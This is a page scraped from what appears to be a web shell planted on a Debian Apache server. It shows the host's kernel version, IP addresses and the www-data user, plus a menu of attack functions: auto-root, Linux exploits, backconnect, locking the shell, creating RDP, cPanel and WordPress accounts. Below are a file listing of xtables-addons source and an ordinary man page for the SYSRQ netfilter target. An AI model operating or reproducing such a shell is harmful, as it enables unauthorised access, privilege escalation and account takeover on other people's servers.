Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.145.100.40
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
xtables-addons-2.12 /
extensions /
[ HOME SHELL ]
Name
Size
Permission
Action
ACCOUNT
[ DIR ]
drwxr-xr-x
pknock
[ DIR ]
drwxr-xr-x
Kbuild
1020
B
-rw-r--r--
Makefile
14.31
KB
-rw-r--r--
Makefile.am
910
B
-rw-r--r--
Makefile.in
13.55
KB
-rw-r--r--
Mbuild
989
B
-rw-r--r--
compat_skbuff.h
325
B
-rw-r--r--
compat_user.h
262
B
-rw-r--r--
compat_xtables.c
1.18
KB
-rw-r--r--
compat_xtables.h
2.52
KB
-rw-r--r--
compat_xtnu.h
1.97
KB
-rw-r--r--
libxt_CHAOS.c
2.56
KB
-rw-r--r--
libxt_CHAOS.man
1
KB
-rw-r--r--
libxt_DELUDE.c
1.11
KB
-rw-r--r--
libxt_DELUDE.man
286
B
-rw-r--r--
libxt_DHCPMAC.c
2.55
KB
-rw-r--r--
libxt_DHCPMAC.man
1.2
KB
-rw-r--r--
libxt_DNETMAP.c
6.62
KB
-rw-r--r--
libxt_DNETMAP.man
7.71
KB
-rw-r--r--
libxt_ECHO.c
1.03
KB
-rw-r--r--
libxt_ECHO.man
141
B
-rw-r--r--
libxt_IPMARK.c
4.71
KB
-rw-r--r--
libxt_IPMARK.man
1.99
KB
-rw-r--r--
libxt_LOGMARK.c
3.27
KB
-rw-r--r--
libxt_LOGMARK.man
312
B
-rw-r--r--
libxt_SYSRQ.c
844
B
-rw-r--r--
libxt_SYSRQ.man
3.67
KB
-rw-r--r--
libxt_TARPIT.c
2.75
KB
-rw-r--r--
libxt_TARPIT.man
2.55
KB
-rw-r--r--
libxt_condition.c
2.5
KB
-rw-r--r--
libxt_condition.man
175
B
-rw-r--r--
libxt_dhcpmac.c
2.52
KB
-rw-r--r--
libxt_dhcpmac.man
207
B
-rw-r--r--
libxt_fuzzy.c
3.37
KB
-rw-r--r--
libxt_fuzzy.man
263
B
-rw-r--r--
libxt_geoip.c
8.21
KB
-rw-r--r--
libxt_geoip.man
1
KB
-rw-r--r--
libxt_gradm.c
2.3
KB
-rw-r--r--
libxt_gradm.man
225
B
-rw-r--r--
libxt_iface.c
7.21
KB
-rw-r--r--
libxt_iface.man
1.39
KB
-rw-r--r--
libxt_ipp2p.c
7.36
KB
-rw-r--r--
libxt_ipp2p.man
1.52
KB
-rw-r--r--
libxt_ipv4options.c
4.32
KB
-rw-r--r--
libxt_ipv4options.man
1.44
KB
-rw-r--r--
libxt_length2.c
4.69
KB
-rw-r--r--
libxt_length2.man
695
B
-rw-r--r--
libxt_lscan.c
2.64
KB
-rw-r--r--
libxt_lscan.man
1.58
KB
-rw-r--r--
libxt_psd.c
5.34
KB
-rw-r--r--
libxt_psd.man
720
B
-rw-r--r--
libxt_quota2.c
4.06
KB
-rw-r--r--
libxt_quota2.man
1.6
KB
-rw-r--r--
mac.c
572
B
-rw-r--r--
xt_CHAOS.c
6.29
KB
-rw-r--r--
xt_CHAOS.h
249
B
-rw-r--r--
xt_DELUDE.c
4.96
KB
-rw-r--r--
xt_DHCPMAC.c
4.18
KB
-rw-r--r--
xt_DHCPMAC.h
311
B
-rw-r--r--
xt_DNETMAP.c
25.22
KB
-rw-r--r--
xt_DNETMAP.h
402
B
-rw-r--r--
xt_ECHO.c
6.98
KB
-rw-r--r--
xt_IPMARK.c
2.75
KB
-rw-r--r--
xt_IPMARK.h
252
B
-rw-r--r--
xt_LOGMARK.c
3.96
KB
-rw-r--r--
xt_LOGMARK.h
209
B
-rw-r--r--
xt_SYSRQ.c
9.75
KB
-rw-r--r--
xt_TARPIT.c
14.94
KB
-rw-r--r--
xt_TARPIT.h
258
B
-rw-r--r--
xt_condition.c
6.75
KB
-rw-r--r--
xt_condition.h
276
B
-rw-r--r--
xt_fuzzy.c
4.65
KB
-rw-r--r--
xt_fuzzy.h
397
B
-rw-r--r--
xt_geoip.c
8.73
KB
-rw-r--r--
xt_geoip.h
1.34
KB
-rw-r--r--
xt_gradm.h
108
B
-rw-r--r--
xt_iface.c
3.32
KB
-rw-r--r--
xt_iface.h
596
B
-rw-r--r--
xt_ipp2p.c
23.63
KB
-rw-r--r--
xt_ipp2p.h
995
B
-rw-r--r--
xt_ipv4options.c
1.96
KB
-rw-r--r--
xt_ipv4options.h
581
B
-rw-r--r--
xt_length2.c
6.99
KB
-rw-r--r--
xt_length2.h
457
B
-rw-r--r--
xt_lscan.c
7.85
KB
-rw-r--r--
xt_lscan.h
200
B
-rw-r--r--
xt_psd.c
14.2
KB
-rw-r--r--
xt_psd.h
792
B
-rw-r--r--
xt_quota2.c
9
KB
-rw-r--r--
xt_quota2.h
478
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : libxt_SYSRQ.man
.PP The SYSRQ target allows to remotely trigger sysrq on the local machine over the network. This can be useful when vital parts of the machine hang, for example an oops in a filesystem causing locks to be not released and processes to get stuck as a result \(em if still possible, use /proc/sysrq-trigger. Even when processes are stuck, interrupts are likely to be still processed, and as such, sysrq can be triggered through incoming network packets. .PP The xt_SYSRQ implementation uses a salted hash and a sequence number to prevent network sniffers from either guessing the password or replaying earlier requests. The initial sequence number comes from the time of day so you will have a small window of vulnerability should time go backwards at a reboot. However, the file /sys/module/xt_SYSREQ/seqno can be used to both query and update the current sequence number. Also, you should limit as to who can issue commands using \fB\-s\fP and/or \fB\-m mac\fP, and also that the destination is correct using \fB\-d\fP (to protect against potential broadcast packets), noting that it is still short of MAC/IP spoofing: .IP \-A INPUT \-s 10.10.25.1 \-m mac \-\-mac\-source aa:bb:cc:dd:ee:ff \-d 10.10.25.7 \-p udp \-\-dport 9 \-j SYSRQ .IP (with IPsec) \-A INPUT \-s 10.10.25.1 \-d 10.10.25.7 \-m policy \-\-dir in \-\-pol ipsec \-\-proto esp \-\-tunnel\-src 10.10.25.1 \-\-tunnel\-dst 10.10.25.7 \-p udp \-\-dport 9 \-j SYSRQ .PP You should also limit the rate at which connections can be received to limit the CPU time taken by illegal requests, for example: .IP \-A INPUT \-s 10.10.25.1 \-m mac \-\-mac\-source aa:bb:cc:dd:ee:ff \-d 10.10.25.7 \-p udp \-\-dport 9 \-m limit \-\-limit 5/minute \-j SYSRQ .PP This extension does not take any options. The \fB\-p udp\fP options are required. .PP The SYSRQ password can be changed through /sys/module/xt_SYSRQ/parameters/password, for example: .IP echo \-n "password" >/sys/module/xt_SYSRQ/parameters/password .PP The module will not respond to sysrq requests until a password has been set. .PP Alternatively, the password may be specified at modprobe time, but this is insecure as people can possible see it through ps(1). You can use an option line in e.g. /etc/modprobe.d/xt_sysrq if it is properly guarded, that is, only readable by root. .IP options xt_SYSRQ password=cookies .PP The hash algorithm can also be specified as a module option, for example, to use SHA-256 instead of the default SHA-1: .IP options xt_SYSRQ hash=sha256 .PP The xt_SYSRQ module is normally silent unless a successful request is received, but the \fIdebug\fP module parameter can be used to find exactly why a seemingly correct request is not being processed. .PP To trigger SYSRQ from a remote host, just use socat: .PP .nf sysrq_key="s" # the SysRq key(s) password="password" seqno="$(date +%s)" salt="$(dd bs=12 count=1 if=/dev/urandom 2>/dev/null | openssl enc \-base64)" ipaddr="2001:0db8:0000:0000:0000:ff00:0042:8329" req="$sysrq_key,$seqno,$salt" req="$req,$(echo \-n "$req,$ipaddr,$password" | sha1sum | cut \-c1\-40)" echo "$req" | socat stdin udp\-sendto:$ipaddr:9 .fi .PP See the Linux docs for possible sysrq keys. Important ones are: re(b)oot, power(o)ff, (s)ync filesystems, (u)mount and remount readonly. More than one sysrq key can be used at once, but bear in mind that, for example, a sync may not complete before a subsequent reboot or poweroff. .PP An IPv4 address should have no leading zeros, an IPv6 address should be in the full expanded form (as shown above). The debug option will cause output to be emitted in the same form. .PP The hashing scheme should be enough to prevent mis-use of SYSRQ in many environments, but it is not perfect: take reasonable precautions to protect your machines.
Close
